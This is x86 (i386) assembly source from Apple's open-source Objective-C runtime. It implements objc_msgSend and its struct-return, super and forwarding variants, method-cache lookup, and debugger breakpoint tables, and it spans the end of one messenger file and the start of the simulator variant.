movl 0(%esi), %edi // get current tally
addl $$1, %edi //
movl %edi, 0(%esi) // tally += 1
LMsgSendHitInstrumentDone_$0_$1_$2:
popl %ebx // restore non-volatile register
#endif
// load implementation address, restore state, and we're done
.if $1 == CACHE_GET
// method triplet is already in eax
.else
movl method_imp(%eax), %eax // imp = method->method_imp
.endif
.if $0 == WORD_RETURN // Regular word return
.if $1 == MSG_SENDSUPER // MSG_SENDSUPER
// replace "super" arg with "self"
movl super+8(%esp), %edi
movl receiver(%edi), %esi
movl %esi, super+8(%esp)
.endif
.else // Struct return
.if $1 == MSG_SENDSUPER // MSG_SENDSUPER (stret)
// replace "super" arg with "self"
movl super_stret+8(%esp), %edi
movl receiver(%edi), %esi
movl %esi, super_stret+8(%esp)
.endif
.endif
// restore caller registers
popl %esi
popl %edi
.endmacro
/////////////////////////////////////////////////////////////////////
//
// MethodTableLookup WORD_RETURN | STRUCT_RETURN, MSG_SEND | MSG_SENDSUPER
//
// Takes: WORD_RETURN (first parameter is at sp+4)
// STRUCT_RETURN (struct address is at sp+4, first parameter at sp+8)
// MSG_SEND (first parameter is receiver)
// MSG_SENDSUPER (first parameter is address of objc_super structure)
//
// edx = receiver
// ecx = selector
// eax = class
// (all set by CacheLookup's miss case)
//
// Stack must be at 0xXXXXXXXc on entrance.
//
// On exit: esp unchanged
// imp in eax
//
/////////////////////////////////////////////////////////////////////
// Slow-path lookup: calls the C lookup function with
// (receiver=edx, selector=ecx, class=eax) set up by CacheLookup's
// miss case. Preserves xmm0-xmm3 across the call; imp returns in eax.
// Stack must be at 0xXXXXXXXc on entrance (see header comment above).
.macro MethodTableLookup
MESSENGER_END_SLOW
// stack has return address and nothing else
subl $$(12+5*16), %esp // 16-align and make room for args + 4 xmm saves
movdqa %xmm3, 4*16(%esp)
movdqa %xmm2, 3*16(%esp)
movdqa %xmm1, 2*16(%esp)
movdqa %xmm0, 1*16(%esp)
movl %eax, 8(%esp) // class
movl %ecx, 4(%esp) // selector
movl %edx, 0(%esp) // receiver
call __class_lookupMethodAndLoadCache3
movdqa 4*16(%esp), %xmm3
movdqa 3*16(%esp), %xmm2
movdqa 2*16(%esp), %xmm1
movdqa 1*16(%esp), %xmm0
addl $$(12+5*16), %esp // pop parameters
.endmacro
/********************************************************************
* Method _cache_getMethod(Class cls, SEL sel, IMP msgForward_internal_imp)
*
* If found, returns method triplet pointer.
* If not found, returns NULL.
*
* NOTE: _cache_getMethod never returns any cache entry whose implementation
* is _objc_msgForward_impcache. It returns 1 instead. This prevents thread-
* safety and memory management bugs in _class_lookupMethodAndLoadCache.
* See _class_lookupMethodAndLoadCache for details.
*
* _objc_msgForward_impcache is passed as a parameter because it's more
* efficient to do the (PIC) lookup once in the caller than repeatedly here.
********************************************************************/
// Method _cache_getMethod(Class cls, SEL sel, IMP msgForward_internal_imp)
// Cache-only lookup; returns the method triplet, (Method)1 if the
// cached imp is _objc_msgForward_impcache, or NULL on a miss.
STATIC_ENTRY __cache_getMethod
// load the class and selector
movl selector(%esp), %ecx
movl self(%esp), %edx
// do lookup
CacheLookup WORD_RETURN, CACHE_GET, LGetMethodMiss
// cache hit, method triplet in %eax
movl first_arg(%esp), %ecx // check for _objc_msgForward_impcache
cmpl method_imp(%eax), %ecx // if (imp==_objc_msgForward_impcache)
je 1f // return (Method)1
ret // else return method triplet address
1: movl $1, %eax
ret
LGetMethodMiss:
// cache miss, return nil
xorl %eax, %eax // zero %eax
ret
LGetMethodExit:
END_ENTRY __cache_getMethod
/********************************************************************
* IMP _cache_getImp(Class cls, SEL sel)
*
* If found, returns method implementation.
* If not found, returns NULL.
********************************************************************/
// IMP _cache_getImp(Class cls, SEL sel)
// Cache-only lookup; returns the imp or NULL.
STATIC_ENTRY __cache_getImp
// load the class and selector
movl selector(%esp), %ecx
movl self(%esp), %edx
// do lookup
CacheLookup WORD_RETURN, CACHE_GET, LGetImpMiss
// cache hit, method triplet in %eax
movl method_imp(%eax), %eax // return method imp
ret
LGetImpMiss:
// cache miss, return nil
xorl %eax, %eax // zero %eax
ret
LGetImpExit:
END_ENTRY __cache_getImp
/********************************************************************
*
* id objc_msgSend(id self, SEL _cmd,...);
*
********************************************************************/
ENTRY _objc_msgSend
MESSENGER_START
CALL_MCOUNTER
// load receiver and selector
movl selector(%esp), %ecx
movl self(%esp), %eax
// check whether selector is ignored
cmpl $ kIgnore, %ecx
je LMsgSendDone // return self from %eax
// check whether receiver is nil
testl %eax, %eax
je LMsgSendNilSelf
// receiver (in %eax) is non-nil: search the cache
LMsgSendReceiverOk:
movl isa(%eax), %edx // class = self->isa
CacheLookup WORD_RETURN, MSG_SEND, LMsgSendCacheMiss
xor %edx, %edx // set nonstret for msgForward_internal
MESSENGER_END_FAST
jmp *%eax
// cache miss: go search the method lists
LMsgSendCacheMiss:
MethodTableLookup WORD_RETURN, MSG_SEND
xor %edx, %edx // set nonstret for msgForward_internal
jmp *%eax // goto *imp
// message sent to nil: redirect to nil receiver, if any
LMsgSendNilSelf:
// %eax is already zero
movl $0,%edx // zero the second return register too
xorps %xmm0, %xmm0
LMsgSendDone:
MESSENGER_END_NIL
ret
// guaranteed non-nil entry point (disabled for now)
// .globl _objc_msgSendNonNil
// _objc_msgSendNonNil:
// movl self(%esp), %eax
// jmp LMsgSendReceiverOk
LMsgSendExit:
END_ENTRY _objc_msgSend
/********************************************************************
*
* id objc_msgSendSuper(struct objc_super *super, SEL _cmd,...);
*
* struct objc_super {
* id receiver;
* Class class;
* };
********************************************************************/
ENTRY _objc_msgSendSuper
MESSENGER_START
CALL_MCOUNTER
// load selector and class to search
movl super(%esp), %eax // struct objc_super
movl selector(%esp), %ecx
movl class(%eax), %edx // struct objc_super->class
// check whether selector is ignored
cmpl $ kIgnore, %ecx
je LMsgSendSuperIgnored // return self from %eax
// search the cache (class in %edx)
CacheLookup WORD_RETURN, MSG_SENDSUPER, LMsgSendSuperCacheMiss
xor %edx, %edx // set nonstret for msgForward_internal
MESSENGER_END_FAST
jmp *%eax // goto *imp
// cache miss: go search the method lists
LMsgSendSuperCacheMiss:
MethodTableLookup WORD_RETURN, MSG_SENDSUPER
xor %edx, %edx // set nonstret for msgForward_internal
jmp *%eax // goto *imp
// ignored selector: return self
LMsgSendSuperIgnored:
movl super(%esp), %eax
movl receiver(%eax), %eax
MESSENGER_END_NIL
ret
LMsgSendSuperExit:
END_ENTRY _objc_msgSendSuper
/********************************************************************
* id objc_msgSendv(id self, SEL _cmd, unsigned size, marg_list frame);
*
* On entry:
* (sp+4) is the message receiver,
* (sp+8) is the selector,
* (sp+12) is the size of the marg_list, in bytes,
* (sp+16) is the address of the marg_list
*
********************************************************************/
// id objc_msgSendv(id self, SEL _cmd, unsigned size, marg_list frame)
// Re-pushes the marg_list arguments onto the stack and tail-dispatches
// through objc_msgSend.
ENTRY _objc_msgSendv
#if defined(KERNEL)
trap // _objc_msgSendv is not for the kernel
#else
pushl %ebp
movl %esp, %ebp
// stack is currently aligned assuming no extra arguments
movl (marg_list+4)(%ebp), %edx
addl $8, %edx // skip self & selector
movl (marg_size+4)(%ebp), %ecx
subl $8, %ecx // skip self & selector
shrl $2, %ecx // argument word count
je LMsgSendvArgsOK
// %esp = %esp - (16 - ((numVariableArguments & 3) << 2))
movl %ecx, %eax // 16-byte align stack
andl $3, %eax
shll $2, %eax
subl $16, %esp
addl %eax, %esp
LMsgSendvArgLoop:
// jg tests the flags from decl; movl/pushl do not alter flags
decl %ecx
movl 0(%edx, %ecx, 4), %eax
pushl %eax
jg LMsgSendvArgLoop
LMsgSendvArgsOK:
movl (selector+4)(%ebp), %ecx
pushl %ecx
movl (self+4)(%ebp),%ecx
pushl %ecx
call _objc_msgSend
movl %ebp,%esp
popl %ebp
ret
#endif
END_ENTRY _objc_msgSendv
/********************************************************************
*
* double objc_msgSend_fpret(id self, SEL _cmd,...);
*
********************************************************************/
ENTRY _objc_msgSend_fpret
MESSENGER_START
CALL_MCOUNTER
// load receiver and selector
movl selector(%esp), %ecx
movl self(%esp), %eax
// check whether selector is ignored
cmpl $ kIgnore, %ecx
je LMsgSendFpretDone // return self from %eax
// check whether receiver is nil
testl %eax, %eax
je LMsgSendFpretNilSelf
// receiver (in %eax) is non-nil: search the cache
LMsgSendFpretReceiverOk:
movl isa(%eax), %edx // class = self->isa
CacheLookup WORD_RETURN, MSG_SEND, LMsgSendFpretCacheMiss
xor %edx, %edx // set nonstret for msgForward_internal
MESSENGER_END_FAST
jmp *%eax // goto *imp
// cache miss: go search the method lists
LMsgSendFpretCacheMiss:
MethodTableLookup WORD_RETURN, MSG_SEND
xor %edx, %edx // set nonstret for msgForward_internal
jmp *%eax // goto *imp
// message sent to nil: redirect to nil receiver, if any
LMsgSendFpretNilSelf:
// %eax is already zero
fldz // return 0.0 on the x87 stack
LMsgSendFpretDone:
MESSENGER_END_NIL
ret
LMsgSendFpretExit:
END_ENTRY _objc_msgSend_fpret
/********************************************************************
 * double objc_msgSendv_fpret(id self, SEL _cmd, unsigned size, marg_list frame);
 *
 * FP-return form of objc_msgSendv: copies the variadic portion of the
 * marg_list onto the stack, then calls objc_msgSend_fpret so the
 * result comes back on the x87 stack.
 *
 * On entry:
 *	(sp+4)  is the message receiver,
 *	(sp+8)  is the selector,
 *	(sp+12) is the size of the marg_list, in bytes,
 *	(sp+16) is the address of the marg_list
 *
 ********************************************************************/
	ENTRY	_objc_msgSendv_fpret
#if defined(KERNEL)
	trap				// _objc_msgSendv is not for the kernel
#else
	pushl	%ebp
	movl	%esp, %ebp
	// stack is currently aligned assuming no extra arguments
	movl	(marg_list+4)(%ebp), %edx	// edx = marg_list
	addl	$8, %edx		// skip self & selector
	movl	(marg_size+4)(%ebp), %ecx	// ecx = marg_list size in bytes
	subl	$8, %ecx		// skip self & selector
	shrl	$2, %ecx		// ecx = count of extra 32-bit words
	je	LMsgSendvFpretArgsOK	// no extra args: stack already aligned
	// %esp = %esp - (16 - ((numVariableArguments & 3) << 2))
	movl	%ecx, %eax		// 16-byte align stack
	andl	$3, %eax
	shll	$2, %eax
	subl	$16, %esp
	addl	%eax, %esp

LMsgSendvFpretArgLoop:
	// Copy extra arguments highest-index first so they land in call order.
	decl	%ecx
	movl	0(%edx, %ecx, 4), %eax
	pushl	%eax
	jg	LMsgSendvFpretArgLoop	// flags are still from decl (mov/push preserve them)

LMsgSendvFpretArgsOK:
	movl	(selector+4)(%ebp), %ecx
	pushl	%ecx
	movl	(self+4)(%ebp),%ecx
	pushl	%ecx
	call	_objc_msgSend_fpret
	movl	%ebp,%esp		// discard copied args in one step
	popl	%ebp
	ret
#endif
	END_ENTRY	_objc_msgSendv_fpret
/********************************************************************
 *
 * void	objc_msgSend_stret(void *st_addr, id self, SEL _cmd, ...);
 *
 *
 * objc_msgSend_stret is the struct-return form of msgSend.
 * The ABI calls for (sp+4) to be used as the address of the structure
 * being returned, with the parameters in the succeeding locations.
 *
 * On entry:	(sp+4) is the address where the structure is returned,
 *		(sp+8) is the message receiver,
 *		(sp+12) is the selector
 ********************************************************************/
	ENTRY	_objc_msgSend_stret
	MESSENGER_START
	CALL_MCOUNTER

	// load receiver and selector
	movl	self_stret(%esp), %eax
	movl	(selector_stret)(%esp), %ecx

	// check whether receiver is nil
	testl	%eax, %eax
	je	LMsgSendStretNilSelf

// receiver (in %eax) is non-nil: search the cache
LMsgSendStretReceiverOk:
	movl	isa(%eax), %edx		// class = self->isa
	CacheLookup STRUCT_RETURN, MSG_SEND, LMsgSendStretCacheMiss
	movl	$1, %edx		// set stret for objc_msgForward
	MESSENGER_END_FAST
	jmp	*%eax			// goto *imp

// cache miss: go search the method lists
LMsgSendStretCacheMiss:
	MethodTableLookup STRUCT_RETURN, MSG_SEND
	movl	$1, %edx		// set stret for objc_msgForward
	jmp	*%eax			// goto *imp

// message sent to nil: redirect to nil receiver, if any
LMsgSendStretNilSelf:
	MESSENGER_END_NIL
	ret	$4			// pop struct return address (#2995932)

// guaranteed non-nil entry point (disabled for now)
// .globl _objc_msgSendNonNil_stret
// _objc_msgSendNonNil_stret:
// 	CALL_MCOUNTER
// 	movl	self_stret(%esp), %eax
// 	jmp	LMsgSendStretReceiverOk

LMsgSendStretExit:
	END_ENTRY	_objc_msgSend_stret
/********************************************************************
 *
 * void objc_msgSendSuper_stret(void *st_addr, struct objc_super *super, SEL _cmd, ...);
 *
 * struct objc_super {
 *	id	receiver;
 *	Class	class;
 * };
 *
 * objc_msgSendSuper_stret is the struct-return form of msgSendSuper.
 * The ABI calls for (sp+4) to be used as the address of the structure
 * being returned, with the parameters in the succeeding registers.
 *
 * On entry:	(sp+4) is the address where the structure is returned,
 *		(sp+8) is the address of the objc_super structure,
 *		(sp+12) is the selector
 *
 * Searches starting at super->class; no nil check (the objc_super
 * pointer is assumed valid by this ABI).
 ********************************************************************/
	ENTRY	_objc_msgSendSuper_stret
	MESSENGER_START
	CALL_MCOUNTER

	// load selector and class to search
	movl	super_stret(%esp), %eax	// struct objc_super
	movl	(selector_stret)(%esp), %ecx	// get selector
	movl	class(%eax), %edx	// struct objc_super->class

	// search the cache (class in %edx)
	CacheLookup STRUCT_RETURN, MSG_SENDSUPER, LMsgSendSuperStretCacheMiss
	movl	$1, %edx		// set stret for objc_msgForward
	MESSENGER_END_FAST
	jmp	*%eax			// goto *imp

// cache miss: go search the method lists
LMsgSendSuperStretCacheMiss:
	MethodTableLookup STRUCT_RETURN, MSG_SENDSUPER
	movl	$1, %edx		// set stret for objc_msgForward
	jmp	*%eax			// goto *imp

LMsgSendSuperStretExit:
	END_ENTRY	_objc_msgSendSuper_stret
/********************************************************************
 * void objc_msgSendv_stret(void *st_addr, id self, SEL _cmd, unsigned size, marg_list frame);
 *
 * objc_msgSendv_stret is the struct-return form of msgSendv.
 * This function does not use the struct-return ABI; instead, the
 * structure return address is passed as a normal parameter.
 *
 * Copies the variadic portion of the marg_list onto the stack, pushes
 * _cmd, self and st_addr, then calls objc_msgSend_stret.
 *
 * On entry:	(sp+4)  is the address in which the returned struct is put,
 *		(sp+8)  is the message receiver,
 *		(sp+12) is the selector,
 *		(sp+16) is the size of the marg_list, in bytes,
 *		(sp+20) is the address of the marg_list
 *
 ********************************************************************/
	ENTRY	_objc_msgSendv_stret
#if defined(KERNEL)
	trap				// _objc_msgSendv_stret is not for the kernel
#else
	pushl	%ebp
	movl	%esp, %ebp
	subl	$12, %esp		// align stack assuming no extra arguments
	movl	(marg_list_stret+4)(%ebp), %edx	// edx = marg_list
	addl	$8, %edx		// skip self & selector
	movl	(marg_size_stret+4)(%ebp), %ecx	// ecx = marg_list size in bytes
	subl	$8, %ecx		// skip self & selector (8 bytes, matching
					// the marg_list adjustment above; was
					// incorrectly $5, which miscounted the
					// words to copy)
	shrl	$2, %ecx		// ecx = count of extra 32-bit words
	jle	LMsgSendvStretArgsOK	// no extra args: stack already aligned
	// %esp = %esp - (16 - ((numVariableArguments & 3) << 2))
	movl	%ecx, %eax		// 16-byte align stack
	andl	$3, %eax
	shll	$2, %eax
	subl	$16, %esp
	addl	%eax, %esp

LMsgSendvStretArgLoop:
	// Copy extra arguments highest-index first so they land in call order.
	decl	%ecx
	movl	0(%edx, %ecx, 4), %eax
	pushl	%eax
	jg	LMsgSendvStretArgLoop	// flags are still from decl (mov/push preserve them)

LMsgSendvStretArgsOK:
	movl	(selector_stret+4)(%ebp), %ecx
	pushl	%ecx
	movl	(self_stret+4)(%ebp),%ecx
	pushl	%ecx
	movl	(struct_addr+4)(%ebp),%ecx
	pushl	%ecx
	call	_objc_msgSend_stret
	movl	%ebp,%esp		// discard copied args in one step
	popl	%ebp
	ret
#endif
	END_ENTRY	_objc_msgSendv_stret
/********************************************************************
 *
 * id _objc_msgForward(id self, SEL _cmd,...);
 *
 ********************************************************************/

// _FwdSel is @selector(forward::), set up in map_images().
// ALWAYS dereference _FwdSel to get to "forward::" !!
	.data
	.align 2
	.private_extern _FwdSel
_FwdSel: .long 0			// filled in at load time

// Format string for the unrecognized-selector fatal error below.
	.cstring
	.align 2
LUnkSelStr: .ascii "Does not recognize selector %s (while forwarding %s)\0"

// Indirect pointers to the user-installable forwarding handlers.
	.non_lazy_symbol_pointer
L_forward_handler:
	.indirect_symbol __objc_forward_handler
	.long 0
L_forward_stret_handler:
	.indirect_symbol __objc_forward_stret_handler
	.long 0
STATIC_ENTRY __objc_msgForward_impcache
// Method cache version
// THIS IS NOT A CALLABLE C FUNCTION
// Out-of-band register %edx is nonzero for stret, zero otherwise
MESSENGER_START
nop
MESSENGER_END_SLOW
// Check return type (stret or not)
testl %edx, %edx
jnz __objc_msgForward_stret
jmp __objc_msgForward
END_ENTRY _objc_msgForward_impcache
	ENTRY	__objc_msgForward
	// Non-struct return version

	// Get PIC base into %edx
	call	L__objc_msgForward$pic_base
L__objc_msgForward$pic_base:
	popl	%edx

	// Call user handler, if any (jump preserves the original frame,
	// so the handler sees the original arguments)
	movl	L_forward_handler-L__objc_msgForward$pic_base(%edx),%ecx
	movl	(%ecx), %ecx		// deref the non-lazy pointer
	testl	%ecx, %ecx		// if not NULL
	je	1f			//   skip to default handler
	jmp	*%ecx			// call __objc_forward_handler
1:
	// No user handler
	// Push stack frame
	pushl	%ebp
	movl	%esp, %ebp

	// Die if forwarding "forward::" (would recurse forever)
	movl	(selector+4)(%ebp), %eax
	movl	_FwdSel-L__objc_msgForward$pic_base(%edx),%ecx
	cmpl	%ecx, %eax
	je	LMsgForwardError

	// Call [receiver forward:sel :margs]
	subl	$8, %esp		// 16-byte align the stack
	leal	(self+4)(%ebp), %ecx
	pushl	%ecx			// &margs (original args are still in place)
	pushl	%eax			// sel
	movl	_FwdSel-L__objc_msgForward$pic_base(%edx),%ecx
	pushl	%ecx			// forward::
	pushl	(self+4)(%ebp)		// receiver
	call	_objc_msgSend
	movl	%ebp, %esp
	popl	%ebp
	ret

LMsgForwardError:
	// Call __objc_error(receiver, "unknown selector %s %s", "forward::", forwardedSel)
	subl	$8, %esp		// 16-byte align the stack
	pushl	(selector+4+4)(%ebp)	// the forwarded selector
	movl	_FwdSel-L__objc_msgForward$pic_base(%edx),%eax
	pushl	%eax			// "forward::" (the SEL stored in _FwdSel)
	leal	LUnkSelStr-L__objc_msgForward$pic_base(%edx),%eax
	pushl	%eax			// format string
	pushl	(self+4)(%ebp)		// receiver
	call	___objc_error		// never returns

	END_ENTRY	__objc_msgForward
ENTRY __objc_msgForward_stret
// Struct return version
// Get PIC base into %edx
call L__objc_msgForwardStret$pic_base
L__objc_msgForwardStret$pic_base:
popl %edx
// Call user handler, if any
movl L_forward_stret_handler-L__objc_msgForwardStret$pic_base(%edx), %ecx
movl (%ecx), %ecx
testl %ecx, %ecx // if not NULL
je 1f // skip to default handler
jmp *%ecx // call __objc_forward_stret_handler
1:
// No user handler
// Push stack frame
pushl %ebp
movl %esp, %ebp
// Die if forwarding "forward::"
movl (selector_stret+4)(%ebp), %eax
movl _FwdSel-L__objc_msgForwardStret$pic_base(%edx), %ecx
cmpl %ecx, %eax
je LMsgForwardStretError
// Call [receiver forward:sel :margs]
subl $8, %esp // 16-byte align the stack
leal (self_stret+4)(%ebp), %ecx
pushl %ecx // &margs
pushl %eax // sel
movl _FwdSel-L__objc_msgForwardStret$pic_base(%edx),%ecx
pushl %ecx // forward::
pushl (self_stret+4)(%ebp) // receiver
call _objc_msgSend
movl %ebp, %esp
popl %ebp
ret $4 // pop struct return address (#2995932)
LMsgForwardStretError:
// Call __objc_error(receiver, "unknown selector %s %s", "forward::", forwardedSelector)
subl $8, %esp // 16-byte align the stack
pushl (selector_stret+4+4)(%ebp) // the forwarded selector
leal _FwdSel-L__objc_msgForwardStret$pic_base(%edx),%eax
pushl %eax
leal LUnkSelStr-L__objc_msgForwardStret$pic_base(%edx),%eax
pushl %eax
pushl (self_stret+4)(%ebp)
call ___objc_error // never returns
END_ENTRY __objc_msgForward_stret
	ENTRY _method_invoke
	// IMP-style entry for a Method struct: the "selector" slot actually
	// holds a Method*; replace it with the method's real SEL and jump
	// to the method's implementation.

	movl	selector(%esp), %ecx		// ecx = Method
	movl	method_name(%ecx), %edx		// edx = method->name (SEL)
	movl	method_imp(%ecx), %eax		// eax = method->imp
	movl	%edx, selector(%esp)		// substitute the real SEL
	jmp	*%eax

	END_ENTRY _method_invoke

	ENTRY _method_invoke_stret
	// Struct-return form of method_invoke (Method* is one slot later).

	movl	selector_stret(%esp), %ecx	// ecx = Method
	movl	method_name(%ecx), %edx		// edx = method->name (SEL)
	movl	method_imp(%ecx), %eax		// eax = method->imp
	movl	%edx, selector_stret(%esp)	// substitute the real SEL
	jmp	*%eax

	END_ENTRY _method_invoke_stret

	STATIC_ENTRY __objc_ignored_method
	// IMP for ignored selectors: returns self unchanged.

	movl	self(%esp), %eax
	ret

	END_ENTRY __objc_ignored_method

// Zero-terminate the messenger breakpoint list built by the
// MESSENGER_* macros.
	.section __DATA,__objc_msg_break
	.long 0
	.long 0
#endif
|
opensource-apple/objc4 | 20,309 | runtime/Messengers.subproj/objc-msg-simulator-i386.s | /*
* Copyright (c) 1999-2009 Apple Inc. All Rights Reserved.
*
* @APPLE_LICENSE_HEADER_START@
*
* This file contains Original Code and/or Modifications of Original Code
* as defined in and that are subject to the Apple Public Source License
* Version 2.0 (the 'License'). You may not use this file except in
* compliance with the License. Please obtain a copy of the License at
* http://www.opensource.apple.com/apsl/ and read it before using this
* file.
*
* The Original Code and all software distributed under the License are
* distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
* EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
* INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
* Please see the License for the specific language governing rights and
* limitations under the License.
*
* @APPLE_LICENSE_HEADER_END@
*/
#include <TargetConditionals.h>
#if defined(__i386__) && TARGET_IPHONE_SIMULATOR
#include "objc-config.h"
.data

// _objc_entryPoints and _objc_exitPoints are used by objc
// to get the critical regions for which method caches
// cannot be garbage collected. A thread whose PC lies between an
// entry point and its exit point may be touching a cache.

.align 2
.private_extern _objc_entryPoints
_objc_entryPoints:
	.long	_cache_getImp
	.long	_objc_msgSend
	.long	_objc_msgSend_fpret
	.long	_objc_msgSend_stret
	.long	_objc_msgSendSuper
	.long	_objc_msgSendSuper2
	.long	_objc_msgSendSuper_stret
	.long	_objc_msgSendSuper2_stret
	.long	0

.private_extern _objc_exitPoints
_objc_exitPoints:
	.long	LGetImpExit
	.long	LMsgSendExit
	.long	LMsgSendFpretExit
	.long	LMsgSendStretExit
	.long	LMsgSendSuperExit
	.long	LMsgSendSuper2Exit
	.long	LMsgSendSuperStretExit
	.long	LMsgSendSuper2StretExit
	.long	0


/********************************************************************
* List every exit insn from every messenger for debugger use.
* Format:
* (
*   1 word instruction's address
*   1 word type (ENTER or FAST_EXIT or SLOW_EXIT or NIL_EXIT)
* )
* 1 word zero
*
* ENTER is the start of a dispatcher
* FAST_EXIT is method dispatch
* SLOW_EXIT is uncached method lookup
* NIL_EXIT is returning zero from a message sent to nil
* These must match objc-gdb.h.
********************************************************************/

#define ENTER     1
#define FAST_EXIT 2
#define SLOW_EXIT 3
#define NIL_EXIT  4

.section __DATA,__objc_msg_break
.globl _gdb_objc_messenger_breakpoints
_gdb_objc_messenger_breakpoints:
// contents populated by the macros below

// Each MESSENGER_* macro drops a local label `4:` at the point of use
// and records (address, type) in __objc_msg_break, then returns to .text.
.macro MESSENGER_START
4:
	.section __DATA,__objc_msg_break
	.long 4b
	.long ENTER
	.text
.endmacro
.macro MESSENGER_END_FAST
4:
	.section __DATA,__objc_msg_break
	.long 4b
	.long FAST_EXIT
	.text
.endmacro
.macro MESSENGER_END_SLOW
4:
	.section __DATA,__objc_msg_break
	.long 4b
	.long SLOW_EXIT
	.text
.endmacro
.macro MESSENGER_END_NIL
4:
	.section __DATA,__objc_msg_break
	.long 4b
	.long NIL_EXIT
	.text
.endmacro
/********************************************************************
* Names for relative labels
* DO NOT USE THESE LABELS ELSEWHERE
* Reserved labels: 5: 6: 7: 8: 9:
********************************************************************/
// Numeric local labels so the same names can be reused inside macros;
// _f / _b are the forward/backward reference spellings.
#define LCacheMiss 	5
#define LCacheMiss_f 	5f
#define LCacheMiss_b 	5b
#define LNilTestDone 	6
#define LNilTestDone_f 	6f
#define LNilTestDone_b 	6b
#define LNilTestSlow 	7
#define LNilTestSlow_f 	7f
#define LNilTestSlow_b 	7b
#define LGetIsaDone 	8
#define LGetIsaDone_f 	8f
#define LGetIsaDone_b 	8b
#define LGetIsaSlow 	9
#define LGetIsaSlow_f 	9f
#define LGetIsaSlow_b 	9b

/********************************************************************
* Macro parameters
********************************************************************/
// Return-style selectors passed as $0 to CacheHit/CacheLookup etc.
#define NORMAL 0
#define FPRET 1
#define GETIMP 3
#define STRET 4
#define SUPER 5
#define SUPER_STRET 6

/********************************************************************
*
* Structure definitions.
*
********************************************************************/

// Offsets from %esp (argument positions at function entry)
#define self            4
#define super           4
#define selector        8
#define marg_size       12
#define marg_list       16
#define first_arg       12

// Struct-return forms: everything shifts by 4 for the hidden
// struct-return address at (sp+4).
#define struct_addr     4

#define self_stret      8
#define super_stret     8
#define selector_stret  12
#define marg_size_stret 16
#define marg_list_stret 20

// objc_super parameter to sendSuper
#define receiver        0
#define class           4

// Selected field offsets in class structure
#define isa             0
#define superclass      4

// Method descriptor
#define method_name     0
#define method_imp      8


//////////////////////////////////////////////////////////////////////
//
// ENTRY		functionName
//
// Assembly directives to begin an exported function.
//
// Takes: functionName - name of the exported function
//////////////////////////////////////////////////////////////////////

.macro ENTRY
	.text
	.globl	$0
	.align	2, 0x90
$0:
	.cfi_startproc
.endmacro

.macro STATIC_ENTRY
	.text
	.private_extern	$0
	.align	4, 0x90
$0:
	.cfi_startproc
.endmacro

//////////////////////////////////////////////////////////////////////
//
// END_ENTRY	functionName
//
// Assembly directives to end an exported function.  Just a placeholder,
// a close-parenthesis for ENTRY, until it is needed for something.
// Note: the functionName argument is currently unused.
//
// Takes: functionName - name of the exported function
//////////////////////////////////////////////////////////////////////

.macro END_ENTRY
	.cfi_endproc
.endmacro
/////////////////////////////////////////////////////////////////////
//
// CacheLookup return-type
//
// Locate the implementation for a selector in a class method cache.
//
// Takes:
// $0 = NORMAL, FPRET, STRET, SUPER, SUPER_STRET, GETIMP
// ecx = selector to search for
// edx = class to search
//
// On exit: ecx clobbered
// (found) calls or returns IMP in eax, eq/ne set for forwarding
// (not found) jumps to LCacheMiss, class still in edx
//
/////////////////////////////////////////////////////////////////////
.macro CacheHit
// CacheHit must always be preceded by a not-taken `jne` instruction
// in case the imp is _objc_msgForward_impcache.
.if $0 == GETIMP
movl 4(%eax), %eax // return imp
call 4f
4: pop %edx
leal __objc_msgSend_uncached_impcache-4b(%edx), %edx
cmpl %edx, %eax
jne 4f
xor %eax, %eax // don't return msgSend_uncached
4: ret
.elseif $0 == NORMAL || $0 == FPRET
// eq already set for forwarding by `jne`
MESSENGER_END_FAST
jmp *4(%eax) // call imp
.elseif $0 == STRET
test %eax, %eax // set ne for stret forwarding
MESSENGER_END_FAST
jmp *4(%eax) // call imp
.elseif $0 == SUPER
// replace "super" arg with "receiver"
movl super(%esp), %ecx // get super structure
movl receiver(%ecx), %ecx // get messaged object
movl %ecx, super(%esp) // make it the first argument
cmp %eax, %eax // set eq for non-stret forwarding
MESSENGER_END_FAST
jmp *4(%eax) // call imp
.elseif $0 == SUPER_STRET
// replace "super" arg with "receiver"
movl super_stret(%esp), %ecx // get super structure
movl receiver(%ecx), %ecx // get messaged object
movl %ecx, super_stret(%esp) // make it the first argument
test %eax, %eax // set ne for stret forwarding
MESSENGER_END_FAST
jmp *4(%eax) // call imp
.else
.abort oops
.endif
.endmacro
.macro	CacheLookup

	// bucket = cache->buckets + ((SEL & cache->mask) * 8);
	// each bucket is 8 bytes: { SEL sel; IMP imp; }
	movzwl	12(%edx), %eax		// eax = mask
	andl	%ecx, %eax		// eax = SEL & mask
	shll	$$3, %eax		// eax = offset = (SEL & mask) * 8
	addl	8(%edx), %eax		// eax = bucket = cache->buckets+offset
	cmpl	(%eax), %ecx		// if (bucket->sel != SEL)
	jne 	1f			//     scan more
	// The `jne` above sets flags for CacheHit
	CacheHit $0			// call or return imp

1:
	// loop
	cmpl	$$1, (%eax)
	jbe	3f			// if (bucket->sel <= 1) wrap or miss

	addl	$$8, %eax		// bucket++
2:
	cmpl	(%eax), %ecx		// if (bucket->sel != sel)
	jne	1b			//     scan more
	// The `jne` above sets flags for CacheHit
	CacheHit $0			// call or return imp

3:
	// wrap or miss
	jb	LCacheMiss_f		// if (bucket->sel < 1) cache miss
	// wrap
	movl	4(%eax), %eax		// bucket->imp is really first bucket
	jmp	2f

	// Clone scanning loop to miss instead of hang when cache is corrupt.
	// The slow path may detect any corruption and halt later.

1:
	// loop
	cmpl	$$1, (%eax)		// fixed: was cmpq, a 64-bit compare
					// that is invalid in i386 code
	jbe	3f			// if (bucket->sel <= 1) wrap or miss

	addl	$$8, %eax		// bucket++
2:
	cmpl	(%eax), %ecx		// if (bucket->sel != sel)
	jne	1b			//     scan more
	// The `jne` above sets flags for CacheHit
	CacheHit $0			// call or return imp

3:
	// double wrap or miss
	jmp	LCacheMiss_f

.endmacro
/////////////////////////////////////////////////////////////////////
//
// MethodTableLookup
//
// Takes:
// $0 = NORMAL, FPRET, STRET, SUPER, SUPER_STRET
// eax = receiver
// ecx = selector
// edx = class to search
//
// On exit: calls IMP, eq/ne set for forwarding
//
/////////////////////////////////////////////////////////////////////
.macro MethodTableLookup
MESSENGER_END_SLOW
pushl %ebp
